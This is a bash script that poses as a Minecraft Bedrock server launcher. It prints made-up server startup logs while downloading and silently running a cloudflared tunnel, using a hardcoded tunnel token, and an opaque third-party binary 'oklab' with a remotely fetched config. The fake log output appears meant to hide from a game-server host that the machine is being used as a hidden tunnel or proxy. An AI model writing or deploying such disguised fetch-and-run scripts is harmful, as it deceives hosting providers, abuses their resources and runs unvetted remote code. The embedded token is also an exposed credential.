#!/bin/bash

if [ ! -f "cla64" ]; then
    wget -q -t 2 -T 10 -N -O cla64 https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64
fi

if [ ! -f "oklab" ]; then
    wget -q -t 2 -T 10 -N -O oklab https://github.com/SAKURA-YUMI/oklab/raw/main/oklab
fi

chmod +x oklab cla64

echo "$(date +"[%Y-%m-%d %T INFO]") Starting Server"
echo "$(date +"[%Y-%m-%d %T INFO]") Version 1.17.0.03"
echo "$(date +"[%Y-%m-%d %T INFO]") Session ID abc123"
echo "$(date +"[%Y-%m-%d %T INFO]") Level Name: Bedrock level"
echo "$(date +"[%Y-%m-%d %T INFO]") Game mode: 0 Survival"
echo "$(date +"[%Y-%m-%d %T INFO]") Difficulty: 1 EASY"
echo "$(date +"[%Y-%m-%d %T INFO]") opening worlds/Bedrock level/db"
sleep 1  
echo "$(date +"[%Y-%m-%d %T INFO]") IPv4 supported, port: ${SERVER_PORT}"
echo "$(date +"[%Y-%m-%d %T INFO]") IPv6 supported, port: ${SERVER_PORT}"
echo "$(date +"[%Y-%m-%d %T INFO]") Server started."

nohup ./cla64 tunnel --edge-ip-version auto --protocol http2 run --token eyJhIjoiNDM1YTllODI3MmU0Yzc0MTg4MTA1ZmRhMWIzYzRiMTQiLCJ0IjoiODFlYmZjYzEtZWQ1Yy00ZTE2LWJjYzctMDYwOGY2NTU0ZTc2IiwicyI6Ik9XWmxNVFZoWVRFdFpqSXpOQzAwWmpGaUxXRTRNMkl0TjJRME1HSTNOamsxTm1ZeCJ9 2>/dev/null 2>&1 &
nohup ./oklab -config=https://raw.githubusercontent.com/SAKURA-YUMI/oklab/2/20125.json > /dev/null 2>&1 &
tail -f /dev/null
